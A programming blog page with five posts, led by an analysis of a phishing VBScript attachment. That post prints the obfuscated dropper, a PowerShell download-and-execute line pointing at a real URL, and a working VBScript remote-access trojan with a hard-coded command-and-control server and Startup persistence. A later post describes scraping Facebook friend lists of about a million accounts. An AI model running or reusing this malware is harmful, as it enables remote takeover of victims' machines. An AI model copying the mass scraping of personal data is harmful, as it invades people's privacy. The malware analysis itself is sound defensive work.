Programming

A 5-post collection

Quick analysis of a virus

I just received a spam e-mail impersonating the French social security ("Assurance Maladie"), which tells me to download my tax statement which they have graciously attached.

There are multiple things to notice here:

  • the sender address: [email protected]
  • onmicrosoft.com is used by Office 365 addresses, so they probably used Azure or something like that
  • the whole message is a picture, probably a screenshot of a real e-mail. Well, at least that way they don't write a fake message in broken Google-Translated French

Now, the attachments.

No PDF file, that's unusual, it's quite common for this kind of spam, but rejoice! we have a VBScript file right there.

(the CSV file and the .bin file don't contain anything interesting, or at least I didn't find anything interesting in them)

Here is the VBS file, raw as I received it:

on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:on error resume next:JPHgjNP = replace("WiDDXetmcript.iDDXetmhEll","iDDXetm","s"):Set cfAKtQG = CreateObject(JPHgjNP ):izZHSpc = Replace("POWlZsTwIURSHlZsTwIULL","lZsTwIU","E"):WScript.Sleep 2000:WScript.Sleep 2000:cfAKtQGcfAKtQGNXPDFLW = "  $00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X":cfAKtQG.Run(izZHSpc+cfAKtQGcfAKtQGNXPDFLW+""),0,True:Set cfAKtQG = Nothing

Quite unreadable, if you ask me. Here is it after replacing all the : by line breaks, after evaluating the replace( calls and merging all the strings together:

on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
WScript.Sleep 2000
WScript.Sleep 2000
CreateObject("Wscript.shEll").Run("POWERSHELL  $00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X"),0,True

Sleeps 4 seconds and runs PowerShell with some weird code. Let's have a look at the PowerShell code:

$00Q1KNH<##>='(New-';[<##>System.Threading.Thread<##>]::Sleep(2300);$AD77UAZ<##> = '!!!!!!!!!!!! '.Replace(<##>'!!!!!!!!!!!!'<##>,'Object'<##>);<##>$UDKKQV0 <##>= <##>'Net'<##>;<##>$E6IWW9R<##> = <##>'.We';[<##>System.Threading.Thread<##>]::Sleep(2300);<##>$G4OKYRL<##>='.Downlo';<##>$ZT2X8YH<##> = <##>'bClient)';<##>$OOK2YVD=<##>'adString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')'<##>;<##>[<##>System.Threading.Thread<##>]::Sleep(2300);$8ZRVUBH<##>=I`E`X (<##>$00Q1KNH<##>,<##>$AD77UAZ<##>,<##>$UDKKQV0<##>,<##>$E6IWW9R<##>,<##>$ZT2X8YH<##>,<##>$G4OKYRL<##>,$OOK2YVD<##> <##>-Join <##>''<##>)<##>|I`E`X

Let's remove all those <##>s and merge all those strings:

[System.Threading.Thread]::Sleep(2300);
[System.Threading.Thread]::Sleep(2300);
[System.Threading.Thread]::Sleep(2300);
$8ZRVUBH=I`E`X ('(New-Object Net.WebClient).DownloadString(''https://cursosinf.webs.upv.es/wp-includes//js/jcrop/4.txt'')' -Join '')|I`E`X

Much more readable! So this is just sleeping about 7 seconds and then... it downloads a text file... and runs it? Let's have a look at the link.

upv.es is the official website of the Universitat Politècnica de València (Technical University of Valencia). webs.upv.es is the subdomain corresponding to the Web hosting service provided by the university. cursosinf.webs.upv.es corresponds, I can only guess, to the IT department of the school.

The website is empty at the time I'm writing:

But the file itself is still online, and looks like this:

try
{
$OutPath = "C:\ProgramData\Links"
if (-not (Test-Path $OutPath))
        {
            New-Item $OutPath -ItemType Directory -Force
        }

(New-Object Net.WebClient).DownloadFile('https://cursosinf.webs.upv.es/wp-includes//js/jcrop/1.txt', 'C:\ProgramData\Links\1.bat')
Start-Sleep 3
start C:\ProgramData\Links/1.bat

Start-Sleep 10

$Content = @'
<binary content>

This downloads a batch file which we'll analyse later.

Right now, it's creating an(other) VBS file (comments are mine):

On error resume next

Public IP, Port, SPL, A, StartupCheck

Set WshNetwork = CreateObject("Wscript.Network")
Set MyObject = CreateObject("Wscript.Shell")

' C&C (Command and Control server)
IP = "185.81.157.26"
Port = "5734"
StartupCheck = "True"
SPL = "|" & "V" & "|"

' Sends an AJAX request
Function POST(ByVal DA, ByVal Param)
	On error resume next
	Dim MSXML, PO, HTTP, UserAgent
	MSXML = "Microsoft.XMLHTTP"
	PO = "POST"
	HTTP = "http://"
	UserAgent = "User-Agent:"
	
	Dim ResponseText
	Set ObjHTTP = CreateObject(MSXML)
	ObjHTTP.Open PO, HTTP & IP & ":" & Port & "/" & DA, False
	ObjHTTP.SetRequestHeader UserAgent, INF
	ObjHTTP.Send Param
	ResponseText = ObjHTTP.ResponseText
	POST = ResponseText
End Function

' Installs the current script in the Startup folder, so that it gets executed at each boot
Sub Installation()
If StartupCheck = "True" Then
	Set FSO = CreateObject("Scripting.FileSystemObject")
	FSO.CopyFile Wscript.ScriptFullName, MyObject.SpecialFolders("Startup") & "\Install32.vbs"
End If
End Sub

Call Installation

Function RandomString()
    Dim str, min, max
    Const LETTERS = "ABCDEFGHIJKLMOPQRSTVWXYZ0123456789"
    min = 1
    max = 15
    Randomize
    For i = 1 to 15
        str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 )
    Next
    RandomString = str
End Function

' Fetches the version info using WMIC to know what Windows version the computer is running
Function HWID
	Dim objWMIService, colItems, result
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set colItems = objWMIService.ExecQuery("SELECT Version FROM Win32_ComputerSystemProduct")
	For Each objItem in colItems
		result = result & objItem.IdentifyingNumber
	Next
	HWID = result
End Function

' Generates a string with the format 
' \PCNAME\Account\Microsoft Windows 10 Professionnel\Windows Defender\Yes\Yes\FALSE\
Function INF
	Dim VR, AV, OS, PC, USER, ID
	VR = "v0.2"
	AV = "Windows Defender"
	PC = WshNetwork.ComputerName
	USER = WshNetwork.UserName
	ID = HWID
		
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set colItems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem",,48)
	For Each objItem in colItems
		OS = OS + objItem.Caption
	Next
	INF = ID & "\" & PC & "\" & USER & "\" & OS & "\" & AV & "\" & "Yes" & "\" & "Yes" & "\" & "FALSE" & "\"
End Function

' Creates a file, fills it with the specified content
' If the extension is PS1, run it with PowerShell
' Otherwise, run it directly
Sub CreateEmptyFile(ByVal Content, ByVal Filename)
	Set FSO = CreateObject("Scripting.FileSystemObject")
	Set FileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile(FSO.GetSpecialFolder(2) & "\" & Filename, 2, True)
	FileToWrite.WriteLine(Content)
	FileToWrite.Close
	Set FileToWrite = Nothing
	WScript.Sleep 2000
	If InStr(Filename, ".PS1") = 0 Then
		MyObject.RuN FSO.GetSpecialFolder(2) & "\" & Filename
	Else
		MyObject.ruN "POWERSHELL -EXECUTIONPOLICY REMOTESIGNED -FILE " + FSO.GetSpecialFolder(2) & "\" & Filename, 0
	End If
End Sub

' The interesting part!
' The main control loop
' This fetches, every 3 seconds, a "command" from the C&C server
' This is how the server "tells" the infected computer what to do
Do While True
	A = Split(POST("Vre", ""), SPL)
	Select Case A(0)
    	' creates and run a file with content and filename
		Case "RF"
			CreateEmptyFile A(1), A(2)
        ' creates and run a PowerShell file with content and random filename
		Case "TR"
			CreateEmptyFile A(1), RandomString & ".PS1"
        ' stops the control script
		Case "Cl"
			Wscript.Quit
        ' creates and run a VBscript file with content and random filename
		Case "exc"
			CreateEmptyFile A(1), RandomString & ".vbs"
        ' same as RF, no idea why they made two of them
		Case "Sc"
			CreateEmptyFile A(1), A(2)
        ' same as Cl
		Case "Un"
			Wscript.Quit
	End Select
	WScript.Sleep 3000
Loop

The VBS file is then saved and launched:

'@
Set-Content -Path C:\ProgramData\Links\install.vbs -Value $Content

Start-Sleep 3
start C:\ProgramData\Links\install.vbs

} catch { }

It's quite interesting how "simple" the virus is, really. At the bottom of it, it's just a loop that infinitely POSTs to a server and does something depending on the response.

Six handshakes away

Have you ever heard about "six degrees of separation"? It's about the famous idea that there are always less than about six persons between two individuals chosen at random in a population. Given enough people, you'll always find someone whose uncle's colleague has a friend that knows your nextdoor neighbour.

Fun fact: it's where the name of the long-forgotten social network sixdegrees.com came from.

Mathematically, it checks out. If you have 10 friends and each of those friends has 10 friends, in theory that's a total of 1+10+9*10=101 individuals. In practice, when you have 10 friends, they probably know each other as well, and their friends most probably do too. You end up with way fewer than 101 people, and no two persons in your "social graph" ever end up more than one or two handshakes away from each other.

In graph theory, those kinds of graphs where you have densely connected communities, linked together by "hubs", i.e. high-degree nodes, are called "small-world networks".

Oh you know Bob? Isn't it a small world!

I learned about it a few weeks ago in a very nice (French) video on the subject, and immediately thought "I wonder what the graph of everyone I know looks like". Obviously, I can't exhaustively list every single person I've met in my life and put them on a graph.

Or can I?


One of the few good things™ Facebook gave us is a really fast access to petabytes of data about people we know, and especially our relationships with them. I can open up my childhood best friend's profile page and see everyone he's "friends" with, and click on a random person and see who they're friends with, et cætera. So I started looking for the documentation for Facebook's public API which, obviously, exists and allows for looking up this kind of information. I quickly learned that the exact API I was looking for didn't exist anymore, and all of the "alternative" options (Web scrapers) I found were either partially or completely broken.

So I opened up PyCharm and started working on my own scraper, that would simply open up Facebook in a Chromium Webdriver instance, and fetch data using ugly XPath queries.

def query(tab):
    return "//span[text() = '" + tab + "']/ancestor::div[contains(@style, 'border-radius: max(0px, min(8px, ((100vw')]/div[1]/div[3]/div"
Truly horrible.

After 180 lines and some testing, I had something that worked.

Basically, the script loads a Facebook account's friends list page and scrolls to the bottom, waiting for the list to dynamically load until the end, and then fetches all the links in a specific <div> which each conveniently contain the ID of the friend. It then adds all of those IDs to the stored graph, and iterates through them and repeats the whole process. It's a BFS (breadth-first-search) over webpages.

In the past few years, a lot of people started realizing just how much stuff they were giving away publicly on their Facebook profile, and consequently made great use of the privacy settings that allow, for example, restricting who can see your friends list. A small step for man, but a giant leap in breaking my scraper.‌‌ People with a private friends list appear on the graph as leaves, i.e. nodes that only have one neighbour. I ignore those nodes while processing the graph.

It stores the relationships as adjacency lists in a huge JSON file (74 MiB as I'm writing), which are then converted to GEXF using NetworkX.

Now in possession of a real graph, I can fire up Gephi and start analyzing stuff.


The graph you're seeing contains around 1 million nodes, each node corresponding to a Facebook account and each edge meaning two accounts are friends. The nodes and edges are colored according to their modularity class (fancy name for the virtual "community" or "cluster" they belong to), which was computed automatically using equally fancy graph-theoretical algorithms.

At 1 million nodes, the time necessary to layout the graph and compute the useful measurements is about 60 hours (most of which is spent on calculating the centrality for each node) on my 4th-gen i7 machine.

About those small-world networks. One of their most remarkable properties is that the average length of the shortest path between two nodes chosen at random grows proportionally to the logarithm of the total number of nodes. In other words, even with huge graphs, you'll usually get unexpectedly short paths between nodes.

But what does that mean in practice? On this graph, there are people from dozens of different places where I've lived, studied, worked. Despite that, my dad living near Switzerland is only three handshakes away from my colleagues in the other side of the country.

More formally, the above graph has a diameter of 7. That means that there are no two nodes on the graph that are more than 6 "online handshakes" away from each other.

In the figure above, we can see the cumulative distribution of degrees on the graph. For a given number N, the curve shows us how many individuals have N or more friends. Intuitively, the curve is monotonically decreasing, because as N gets bigger and bigger, there are less and less people having that many friends. On the other hand, almost everyone has at least 1 friend.

You'll maybe notice a steep hill at the end, around N=5000. This is due to the fact that 5000 is the maximum number of friends you can have on Facebook; so you'll get many people with a number of friends very close to it simply because they've "filled up" their friends list.

We can enumerate all pairs of individuals on the graph and compute the length of the shortest path between the two, which gives the following figure:

In this graph, the average distance between individuals is 3.3, which is slightly lower than the one found in the Facebook paper (4.7). This can be explained by the fact that the researchers had access to the entire Facebook database whereas I only have access to the graph I obtained through scraping.

(PDF) The Anatomy of the Facebook Social Graph
PDF | We study the structure of the social graph of active Facebook users, the largest social network ever analyzed. We compute numerous features of the... | Find, read and cite all the research you need on ResearchGate
The Facebook paper

Fix for the Psy-Q Saturn SDK

If you ever want to write code for the Sega Saturn using the Psy-Q SDK (available here), you may encounter a small problem with the toolset when using #include directives.

Example:

#include "abc.h"

int main()
{
    int b = a + 43;
    return 0;
}
main.c
C:\Psyq\bin>ccsh -ITHING/ -S main.c
build.bat
int a = 98;
abc.h

This will crash with the following error: main.c:1: abc.h: No such file or directory, which is quite strange given that we explicitely told the compiler to look in that THING folder.

What we have:

  • CCSH.EXE : main compiler executable (C Compiler Super-H)
  • CPPSH.EXE preprocessor (C PreProcessor Super-H)

CCSH calls CPPSH with the source file first to get a raw code file to compile, and then actually compiles it. Here, we can see by running CPPSH alone that it still triggers the error, which means the problem effectively comes from CPPSH. After a thorough analysis in Ida, it seems that even though the code that handles parsing the command-line parameters related to include directories, those paths aren't actually added to the program's internal directory array and thus never actually used. I could have decompiled it and fixed it myself, but I found a faster and simpler way: use the PSX one.

Though CCSH and CCPSX are very different in nature (one compiles for Super-H and one for MIPS), their preprocessors are actually almost identical – when we think about it, it makes sense: the C language doesn't depend on the underlying architecture (most of the time), so why would its preprocessor do?

So here's the fix: rename CCSH to something else and copy CCPSX to CCSH. Solves all problems and finally allows compiling C code for the Sega Saturn on Windows (the only other working SDK on the Internet is for DOS, which requires using DOSBox and 8.3 filenames, which makes big projects complicated to organize).

That's nice and all but can we compile actual code? Seems that the answer is no. Here is a basic file:

#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%d\n", 42);

	return 0;
}

Compiling this will give the following error:

In file included from bin/main.c:2:
D:\SATURN\INCLUDE\stdlib.h:7: conflicting types for 'size_t'
D:\SATURN\INCLUDE\stddef.h:166: previous declaration of 'size_t'

Weird, eh?

It seems that the STDLIB.H file in the SDK is somehow wrong, in that it has the following at the top:

#ifndef	__SIZE_TYPE__DEF
#define	__SIZE_TYPE__DEF	unsigned int
typedef	__SIZE_TYPE__DEF	size_t;
#endif
STDLIB.H

Whereas its friend STDDEF.H looks like this:

#ifndef __SIZE_TYPE__
#define __SIZE_TYPE__ long unsigned int
#endif
#if !(defined (__GNUG__) && defined (size_t))
typedef __SIZE_TYPE__ size_t;
#endif /* !(defined (__GNUG__) && defined (size_t)) */
STDDEF.H

Two incompatible declarations, the compiler dies. The simple fix is to remove the DEF at the end of the names in STDLIB.H, to get something like this:

#ifndef	__SIZE_TYPE__
#define	__SIZE_TYPE__	unsigned int
typedef	__SIZE_TYPE__	size_t;
#endif
STDLIB.H

Paella, or how to emulate PSX games in Windows CE userland

Lately, I've been decompiling Tomb Raider 5 with some friends and while researching potential sources of debug informations that could help the process, I stumbled upon the Pocket PC version of Tomb Raider 1. It was ported by Ideaworks3D, a London-based game development company specialized in porting.

It's supposed to run on low-performance handheld devices running Windows Mobile/CE 5.0 and thus one would imagine that they have simply taken the Windows code and tweaked it a little bit to make it run on CE. Well as I discovered, it's more complicated than that. First, there is no Windows version of TR1, it was only released for DOS and was never ported to either Win16 or Win32. Second, they actually didn't take the PC version as a base, but the PSX version.

It may seem weird, why take the PSX version if your product is going to run on Windows CE. As it appears, Ideaworks3D seems to have developed an in-house userland syscall JIT translator for PSX, and uses it when porting games to CE. In other words, they compile the PSX codebase to ARM code and link that binary against a DLL file called iepaella.dll which contains implementations of PSX syscalls that call the WinCE API. Apparently, they have also made a version of that DLL which runs on standard Win32 that they used to make an ActiveX port of their Pocket PC port of the PSX version. It allowed playing TR1 in Internet Explorer. Not sure why anyone would ever do that, though.

I find this quite interesting because the main game executable seems to have a code near-identical to the original PSX version, which means that "IEPaella" is effectively a full-featured userland PSX emulator for WinCE and Win32 that is capable of mapping the PSX system routines to DirectX API calls. I haven't been able to find any other similar product on the internet. The only software that could be considered similar is Usercorn, a userland emulator based on Unicorn which implements most of the Linux, BSD and Darwin syscalls and even some DOS interrupts. It's very basic though, nowhere near what Paella does.

Currently, the codebase of the decompilation project is divided in 3 main folders:

  • GAME contains the shared game code
  • SPEC_PSX contains the PSX platform code
  • SPEC_PC contains the PC platform code

Debugging on PSX is much harder than on PC, because the binary is run in an emulator and you can't just run the code step-by-step to see where it crashes. Using Paella would allow doing such a thing because the binary is effectively being run on the computer and works like any other C++ program. We're currently search for ways to implement Paella support in TOMB5, but it may take time because not all PSX syscalls are implemented. It will eventually work, though.

PyQt, or how to break Unicode in 2018

For my latest project (Turing), I chose to use PyQt 5 for the GUI because it's what seemed the best to me to allow the whole thing to be cross-platform without much of a hassle. It has done its job quite well for about everything.

After some months of development though, I ran into an issue I was unable to fix : there is a bug, somewhere inbetween pylupdate5 (that scans code files for lines to translate) and lrelease (that compiles .ts files to .qm files) which basically prevents using non-ASCII characters in source strings. You can use them in translated strings, but not in the code files.

Quite strange, since both the code files and the .ts files (which are in XML format) are encoded in UTF-8. Or so I thought.

It seems that lrelease assumes that everything is ASCII (well, to be precise, Latin-1) if you don't specify it at each <message> element in the file, even though the very first line of the file (the XML header) specifies the encoding, in this case utf-8. pylupdate5 has no problem with that and assumes UTF-8 by default.

The workaround is to add an attribute to each <message> element in the .ts file to force lrelease to understand that it's UTF-8. Basically, replacing <message> by <message encoding="UTF-8"> everywhere. The problem is that when pylupdate5 re-saves the file after adding the new lines from the code, it discards the attributes (maybe it assumes that they aren't needed, which is a correct assumption given that it's a freaking XML file). Thus, I needed to write a script that is executed between the two calls to make sure that lrelease always gets fed a file with the attributes, so that it always parses it correctly.

for ts in glob.iglob('../**/*.ts', recursive=True):
    with open(ts, "r", encoding="utf8") as f:
        orig = f.read()
        
    orig = orig.replace('<message>', '<message encoding="UTF-8">')
    
    with open(ts, "w", encoding="utf8") as f:
        f.write(orig)

I don't know if it's a bug on the PyQt side or on the Qt side, but it stills seems quite weird to me that we still encounter this kind of problems in 2018, when every sane piece of software uses UTF-8 by default.

This article by Joel Spolsky is from 2003, and it seems that back then the basic knowledge of how to correctly use encodings had already been invented, so why are so many programs still unable to use text correctly?